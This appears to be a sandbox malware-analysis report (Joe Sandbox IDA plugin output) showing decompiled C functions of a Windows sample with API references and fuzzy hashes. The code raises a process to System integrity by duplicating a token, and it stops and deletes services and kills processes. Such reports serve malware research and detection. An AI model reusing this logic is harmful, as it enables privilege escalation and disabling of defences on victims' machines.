            				memcpy( &_v88, L"S-1-16-16384", _t78 << 2);
            				_v8 = 0;
            				_v28 = 0;
            				asm("movsw");
            				_v24 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosw");
            				 *0x9c115c();
            				GetWindowThreadProcessId(0,  &_v16);
            				if(_v16 != 0) {
            					_t38 = E009B5408();
            					__eflags = _t38 - 0x600;
            					asm("sbb eax, eax");
            					_t92 = OpenProcess((_t38 & 0xfffff400) + 0x1000, 0, _v16);
            					__eflags = _t92;
            					if(_t92 == 0) {
            						goto L1;
            					}
            					_t43 = E009B5408();
            					__eflags = _t43 - 0x600;
            					asm("sbb eax, eax");
            					_t46 = OpenProcessToken(_t92, (_t43 & 0xfe1fffff) + 0x2000000,  &_v20);
            					__eflags = _t46;
            					if(_t46 == 0) {
            						goto L1;
            					}
            					_t48 = DuplicateTokenEx(_v20, 0, 0, 2, 1,  &_v12);
            					__eflags = _t48;
            					if(_t48 == 0) {
            						goto L1;
            					}
            					_t51 =  *0x9c118c( &_v88,  &_v8);
            					__eflags = _t51;
            					if(_t51 == 0) {
            						goto L1;
            					}
            					_t93 = _v8;
            					_v48 = 0;
            					asm("stosd");
            					_v24 = 0x20;
            					asm("stosd");
            					_v28 = _t93;
            					asm("stosd");
            					E009B49D3( &_v152, 0, 0x40);
            					_v156 = 0x44;
            					_t58 = SetTokenInformation(_v12, 0x19,  &_v28, GetLengthSid(_t93) + 8);
            					__eflags = _t58;
            					if(_t58 == 0) {
            						goto L1;
            					}
            					_v32 = 0;
            					_t77 = E009B4F8D(0,  &_v32);
            					PathQuoteSpacesW(_t77);
            					_t61 = E009B5359();
            					_t90 = E009B494C(0x1f40);
            					E009B6116(__eflags, _t90, _t77);
            					E009B6116(__eflags, _t90, " ");
            					E009B6116(__eflags, _t90, _t61);
            					 *0x9c1220(_v12, 2, _t77, _t90, 0, 0, 0,  &_v156,  &_v48);
            					__eflags = 0;
            					if(0 != 0) {
            						CloseHandle(_v48);
            						CloseHandle(_v44);
            					}
            					LocalFree(_v8);
            					CloseHandle(_v12);
            					CloseHandle(_v20);
            					return 0;
            				}
            				L1:
            				return 0;
            			}

            APIs
            • GetShellWindow.USER32 ref: 009B41F3
            • GetWindowThreadProcessId.USER32(00000000,?), ref: 009B41FE
            • OpenProcess.KERNEL32(-00001000,00000000,?,?,00000000), ref: 009B422E
            • OpenProcessToken.ADVAPI32(00000000,-02000000,?,?,00000000), ref: 009B4254
            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,00000000), ref: 009B426B
            • ConvertStringSidToSidW.ADVAPI32(?,?), ref: 009B427D
            • GetLengthSid.ADVAPI32(?,?,00000000), ref: 009B42BC
            • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008,?,00000000), ref: 009B42CF
            • PathQuoteSpacesW.SHLWAPI(00000000,?,00000000), ref: 009B42EF
            Similarity
            • API ID: ProcessToken$OpenWindow$ConvertDuplicateInformationLengthPathQuoteShellSpacesStringThread
            • String ID: $D$S-1-16-16384
            • API String ID: 154903557-1080820781
            • Opcode ID: 677c08185f0477ad890c3a4f5daaf7df106f504e7bce0238b0b98c636b17db36
            • Instruction ID: 73048a82425603c3a8231564ca18f58d23d313cd58790f6c84e664308e8041ac
            • Opcode Fuzzy Hash: 677c08185f0477ad890c3a4f5daaf7df106f504e7bce0238b0b98c636b17db36
            • Instruction Fuzzy Hash: 7A518FB2D14109BFEB109FA4DD46FEFBBBCEB05750F040025F615E2152D7349945ABA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E009B5A77(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, char _a4) {
            				int _v8;
            				char _v12;
            				char _v16;
            				char _v20;
            				void _v44;
            				struct _SERVICE_STATUS _v48;
            				char _v116;
            				char _v6796;
            				void* _t25;
            				void* _t26;
            				long _t41;
            				void* _t42;
            				int _t57;
            				void* _t58;
            				signed int _t61;
            				int _t66;
            				void* _t68;
            				long* _t73;
            				void* _t74;
            				void* _t75;
            
            				E009BC580();
            				_t66 = 0;
            				E009B49D3( &_v116, 0, 0x42);
            				_t75 = _t74 + 0xc;
            				_t25 = E009B5408();
            				_t77 = _t25 - 0x600;
            				if(_t25 < 0x600 || E009B5C62(__edx, _t77) == 0) {
            					L21:
            					_t26 = 0;
            					__eflags = 0;
            					goto L22;
            				} else {
            					 *0x9c1de0 = OpenSCManagerW(0, L"ServicesActive", 4);
            					_push( &_v116);
            					_push(0);
            					_push(0x9c0fec);
            					if( *0x9c12b4() != 0) {
            						goto L21;
            					}
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push( &_a4);
            					_push(1);
            					_push( *0x9c0fec);
            					if( *0x9c1164() != 0) {
            						goto L21;
            					}
            					_v12 = 0xa;
            					_push( &_v16);
            					_push( &_v6796);
            					_push( &_v12);
            					_push( &_v20);
            					_push( *0x9c0fec);
            					if( *0x9c10b0() != 0) {
            						L20:
            						 *0x9c105c( *0x9c0fec);
            						CloseServiceHandle( *0x9c1de0);
            						_t26 = 1;
            						L22:
            						return _t26;
            					}
            					_t57 = 0;
            					_v8 = 0;
            					if(_v12 <= 0) {
            						goto L20;
            					}
            					_t73 =  &_v6796;
            					do {
            						_t41 = _t73[0xa3];
            						if(_t41 != 3) {
            							__eflags = _t41 - 0x3e8;
            							if(_t41 == 0x3e8) {
            								goto L19;
            							}
            							L15:
            							_t42 = E009B4B05( *_t73);
            							_pop(0);
            							__eflags = _t42;
            							if(_t42 != 0) {
            								goto L19;
            							}
            							_t68 = OpenProcess(1, _t66,  *_t73);
            							__eflags = _t68;
            							if(_t68 != 0) {
            								TerminateProcess(_t68, 0);
            								E009B4BEE(_t68);
            								_pop(0);
            							}
            							L18:
            							E009B4AB8(0,  *_t73);
            							_t57 = _v8;
            							goto L19;
            						}
            						_t58 = OpenServiceW( *0x9c1de0,  &(_t73[0x83]), 0x10020);
            						if(_t58 == 0) {
            							goto L20;
            						}
            						_t61 = 6;
            						_v48 = _t66;
            						memset( &_v44, 0, _t61 << 2);
            						_t75 = _t75 + 0xc;
            						if(ControlService(_t58, 1,  &_v48) == 0) {
            							_t57 = _v8;
            							_t66 = 0;
            							__eflags = 0;
            							goto L15;
            						}
            						if(DeleteService(_t58) == 0) {
            							goto L20;
            						}
            						CloseServiceHandle(_t58);
            						goto L18;
            						L19:
            						_t57 = _t57 + 1;
            						_t73 =  &(_t73[0xa7]);
            						_v8 = _t57;
            						_t66 = 0;
            					} while (_t57 < _v12);
            					goto L20;
            				}
            			}


            APIs
              • Part of subcall function 009B5C62: VerSetConditionMask.KERNEL32(00000000,00000000,00000080,00000001,?,00000000,?), ref: 009B5CBC
              • Part of subcall function 009B5C62: VerifyVersionInfoW.KERNEL32(0000011C,00000080,00000000), ref: 009B5CCC
            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000004,?,009B303D,?), ref: 009B5ABE
            • OpenServiceW.ADVAPI32(?,00010020), ref: 009B5B60
            • ControlService.ADVAPI32(00000000,00000001,?), ref: 009B5B84
            • DeleteService.ADVAPI32(00000000), ref: 009B5B8F
            • CloseServiceHandle.ADVAPI32(00000000), ref: 009B5B9A
            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009B5BC1
            • TerminateProcess.KERNEL32(00000000,00000000), ref: 009B5BD0
            • CloseServiceHandle.ADVAPI32 ref: 009B5C10
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Service$Open$CloseHandleProcess$ConditionControlDeleteInfoManagerMaskTerminateVerifyVersion
            • String ID: ServicesActive
            • API String ID: 3848605446-3071072050
            • Opcode ID: 755110bd7470d83d542483e8080d214ff1453f792aed20c7f3a763f834a8cd53
            • Instruction ID: b848a09b28ee9732e04a59c7a737dcd4cd453704905938811234f6b520519df0
            • Opcode Fuzzy Hash: 755110bd7470d83d542483e8080d214ff1453f792aed20c7f3a763f834a8cd53
            • Instruction Fuzzy Hash: B541C835A14604AFEB209FA1DD84FEF7BBDEB85760F11402AF602E2152EB349941DB24
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E009B2D36(intOrPtr _a4, intOrPtr _a8) {
            				short _v6;
            				char _v12;
            				short _v14;
            				char _v40;
            				short _v42;
            				char _v80;
            				signed int _t29;
            				signed int _t34;
            				signed int _t40;
            				WCHAR* _t53;
            
            				if( *0x9c230c != 0) {
            					return 1;
            				}
            				_t66 = _a8;
            				if(_a8 != 0) {
            					E009B60E8(_a4);
            					E009B60E8(_t66);
            					if( *0x9c1d98 != 0) {
            						L9:
            						E009B5E33(0x9c0270, 0xc36, 0xc, 0x1a,  &_v40);
            						_v14 = 0;
            						E009B5E33(0x9c0270, 0x4ed, 0xa, 0x26,  &_v80);
            						_v42 = 0;
            						if(E009B6197(_t66,  &_v40) == 0 || E009B6197(_t66,  &_v80) == 0) {
            							_t29 = 1;
            						} else {
            							if(E009B6307(_a4,  &_v40) == 0) {
            								_t34 = E009B6510(0x9c2294, _t66);
            								asm("sbb eax, eax");
            								_t29 =  ~_t34 + 1;
            							} else {
            								E009B5E33(0x9c0270, 0x9da, 6, 6,  &_v12);
            								_v6 = 0;
            								_t40 = E009B6307(_a4,  &_v12);
            								asm("sbb eax, eax");
            								_t29 =  ~( ~_t40);
            							}
            						}
            						L15:
            						L16:
            						return _t29;
            					}
            					_t53 = L"\\\\?\\c:\\windows\\";
            					if( *0x9c1d9c == 0) {
            						GetWindowsDirectoryW(lstrlenW(_t53) * 2 + L"\\\\?\\c:\\windows\\", 0x104);
            						PathAddBackslashW(_t53);
            						E009B60E8(_t53);
            						 *0x9c1d9c = 1;
            					}
            					_t29 = E009B6197(_t53, _a4);
            					if(_t29 != 0) {
            						goto L9;
            					} else {
            						 *0x9c1d98 = 1;
            						goto L15;
            					}
            				}
            				_t29 = 1;
            				goto L16;
            			}

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: \\?\c:\windows\
            • API String ID: 0-2558258126
            • Opcode ID: 7bbcc9867dc48453ba5a5055bb3953a6f750cc32dcaab7d3a886a2dbb960f2dd
            • Instruction ID: 93c5739ebe3ddb9098e57bca8dcd5733ec41c0f4c4a998b88af1e981695e85e9
            • Opcode Fuzzy Hash: 7bbcc9867dc48453ba5a5055bb3953a6f750cc32dcaab7d3a886a2dbb960f2dd
            • Instruction Fuzzy Hash: 1F310971968309BAEB20AB71EE42FEE37ACDF49770F000416F941D50C1EB79D9508760
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E009B4AB8(void* __ecx, long _a4) {
            				long _v8;
            				void* _t6;
            				void* _t13;
            
            				_v8 = _v8 & 0x00000000;
            				_t6 = OpenProcess(0x400, 0, _a4);
            				_t13 = _t6;
            				if(_t13 != 0) {
            					do {
            						GetExitCodeProcess(_t13,  &_v8);
            						Sleep(0x3e8);
            					} while (_v8 == 0x103);
            					CloseHandle(_t13);
            					_t6 = 1;
            				}
            				return _t6;
            			}


            APIs
            • OpenProcess.KERNEL32(00000400,00000000,009B5BE4,?,?,?,009B5BE4), ref: 009B4ACB
            • GetExitCodeProcess.KERNEL32 ref: 009B4ADC
            • Sleep.KERNEL32(000003E8,?,?,009B5BE4), ref: 009B4AE7
            • CloseHandle.KERNEL32(00000000,?,?,009B5BE4), ref: 009B4AF7
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Process$CloseCodeExitHandleOpenSleep
            • String ID:
            • API String ID: 126888380-0
            • Opcode ID: 3f3a00fac35e67eb6bf6abba80f73b543befadf1286d134cdfd1e8d374a103e3
            • Instruction ID: aa0cf552af18ffaae420544092c3ef616feab0e3f3e67aa22e21ac1cd7e5c150
            • Opcode Fuzzy Hash: 3f3a00fac35e67eb6bf6abba80f73b543befadf1286d134cdfd1e8d374a103e3
            • Instruction Fuzzy Hash: 75E02B32866218FBD711AB90DD09FED77ACDF05736F000150FA00D1041D7744A00E7E8
            Uniqueness

            Uniqueness Score: -1.00%